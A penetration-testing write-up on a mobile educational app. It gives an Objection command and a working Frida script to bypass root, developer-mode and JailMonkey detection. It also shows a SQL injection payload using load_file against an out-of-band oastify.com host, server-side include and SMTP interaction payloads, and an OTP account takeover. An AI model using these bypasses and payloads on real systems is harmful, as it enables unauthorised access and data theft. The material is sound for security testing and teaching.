
Introduction
During my recent penetration testing project for a company, I tested their educational courses application.
Tools and Methodology
The tools used for dynamic analysis, and the methodology followed during the testing process:
- Mobile Security Framework (MobSF)
- Frida
- Burp Suite
- Objection
- nuclei
- sqlmap
- apktool
- jd-gui
Summary of Findings
I found 2 High and 2 Medium vulnerabilities:
1- SSL Pinning Bypass
2- Account takeover
3- SQL Injection (SQLi)
4- Disclosure of sensitive data in URL parameters
5- External service interaction (DNS & SMTP)
I started with apktool and nuclei.
The challenge here was to bypass all the detections in order to get access to the API:
developer-mode detection plus the RootBeer and JailMonkey root detections.
If you bypass the dev-mode check you then hit root detection, and so on, so I asked ChatGPT to combine all of them in one script, except SSL pinning, which I handled with Objection.
So now we have to bypass SSL pinning. If we run the Frida script together with Objection it gets terminated, so
we open a first terminal to run the Frida script, and then run Objection in a second one with this line:
```
objection --gadget $(frida-ps -Uai | grep com.company | awk '{print $1}') explore
```
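The combined bypass described above, as an added example and not the post's own (ChatGPT-generated) script: one Frida script that defeats the three checks in a single run, so only SSL pinning is left for Objection. The RootBeer class name and the `Settings.Global` keys come from the public RootBeer source and AOSP; the JailMonkey class name (`com.gantix.JailMonkey.JailMonkeyModule`) is an assumption taken from that library's Android source and must be confirmed against the decompiled APK (apktool / jd-gui) before use. The two pure helpers hold the spoofing rules so they can be checked outside Frida.

```javascript
// Added example: Frida hooks for RootBeer, developer-mode and JailMonkey checks.
// Not the original post's script. Class/key names are labelled where assumed.

// Settings.Global keys that reveal developer mode and USB debugging (AOSP constants).
const DEV_MODE_KEYS = new Set(["development_settings_enabled", "adb_enabled"]);

// Pure helper: answer 0 ("off") for developer-mode keys, pass every other key through.
function spoofSettingValue(key, originalValue) {
  return DEV_MODE_KEYS.has(key) ? 0 : originalValue;
}

// Pure helper: JailMonkey publishes its verdicts as a map of boolean flags; every
// boolean becomes false ("nothing detected"), non-boolean entries are kept as-is.
function clearDetectionFlags(flags) {
  const cleaned = {};
  for (const [k, v] of Object.entries(flags)) {
    cleaned[k] = typeof v === "boolean" ? false : v;
  }
  return cleaned;
}

// Hook one library at a time so an app that lacks one of them does not kill the script.
function tryHook(label, fn) {
  try { fn(); console.log("[+] hooked " + label); }
  catch (e) { console.log("[-] " + label + " not hooked: " + e.message); }
}

function installHooks() {
  Java.perform(function () {
    // 1. RootBeer: both public entry points always answer "not rooted".
    tryHook("RootBeer", function () {
      const RootBeer = Java.use("com.scottyab.rootbeer.RootBeer");
      RootBeer.isRooted.implementation = function () { return false; };
      RootBeer.isRootedWithBusyBoxCheck.implementation = function () { return false; };
    });

    // 2. Developer mode: apps read Settings.Global.getInt(resolver, key, default).
    tryHook("Settings.Global.getInt", function () {
      const Global = Java.use("android.provider.Settings$Global");
      Global.getInt.overload("android.content.ContentResolver", "java.lang.String", "int")
        .implementation = function (resolver, key, def) {
          const real = this.getInt(resolver, key, def); // original value from the OS
          return spoofSettingValue(key, real);
        };
    });

    // 3. JailMonkey (React Native): getConstants() returns a java.util.Map of flags.
    //    ASSUMPTION: class name as in the library's Android source; verify in the APK.
    tryHook("JailMonkey", function () {
      const JailMonkey = Java.use("com.gantix.JailMonkey.JailMonkeyModule");
      const JBool = Java.use("java.lang.Boolean");
      JailMonkey.getConstants.implementation = function () {
        const map = this.getConstants();
        const keys = map.keySet().toArray();
        // Copy the Java map into a plain object so the same rule as the helper applies.
        const plain = {};
        for (const k of keys) {
          const v = map.get(k);
          const isBool = v !== null && v.getClass().getName() === "java.lang.Boolean";
          plain[k.toString()] = isBool ? v.toString() === "true" : v;
        }
        const cleaned = clearDetectionFlags(plain);
        for (const k of keys) {
          if (typeof cleaned[k.toString()] === "boolean") {
            map.put(k, JBool.FALSE.value); // every detection flag now reads "false"
          }
        }
        return map;
      };
    });
  });
}

// `Java` only exists inside Frida; under plain Node the file just exposes the helpers.
if (typeof Java !== "undefined") {
  installHooks();
}
```

Load it in the first terminal before attaching Objection, e.g. `frida -U -f com.company.app -l bypass.js` (spawn the app with the script injected), then run the `objection --gadget ... explore` line above in the second terminal for the SSL-pinning bypass.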
Now we have access to the API requests.
First thing: test the Reset Password endpoint, so I open my checklist note.
## 1- Account Takeover
---
Discovered an account takeover in the password reset endpoint **check_mail_for_reset.php**.
Through this vulnerability an attacker can gain unauthorized access to the user's account by intercepting the
reset-password request and using the OTP.
So I close my checklist note.
## 2- SQL Injection
---
Issue detail
The code JSON parameter appears to be vulnerable to SQL injection attacks. The payload `(select \356idrfjq2uj8x104al8bdh0irorcn0e22upmdb.oastify.com\nqk'))` was submitted in the code parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
The database appears to be MySQL.
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
A wide range of damaging attacks can often be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and taking control of the database server.
All of these JSON parameters were vulnerable to SQL injection:
```
{
"email"
"student_id"
"category_id"
"student_name"
"student_avater_url"
"student_nickname"
"course_id"
"unit_id"
}
```
I also used the sqlite-data-monitor Frida script by @SecFathy: https://codeshare.frida.re/@SecFathy/sqlite-data-monitor/
## Disclosure of sensitive data in URL
## External service interaction (DNS & SMTP)
---
Issue detail
DNS
It is possible to induce the application to perform server-side DNS lookups of
arbitrary domain names.
The server-side include statement "-->'-->`--> was submitted in the code JSON
parameter. This payload is designed to trigger a CNAME DNS lookup if the
application is vulnerable to server-side include.
The application performed a DNS lookup of the specified domain of an unexpected
type. This indicates that the server has a component that is parsing out hostnames
and making the interaction.
Issue detail
SMTP
It is possible to induce the application to send emails via SMTP to arbitrary
addresses.
The email address 5bhkjtllw40lez72acrahfn2otutikc843svfl3a@oastify.com was
submitted in the email JSON parameter.
The application sent an email via SMTP to the specified address.
An attacker could use this to send phishing links :D
I also found stored and reflected cross-site scripting (XSS), but with no exploitable impact through the ``web view``.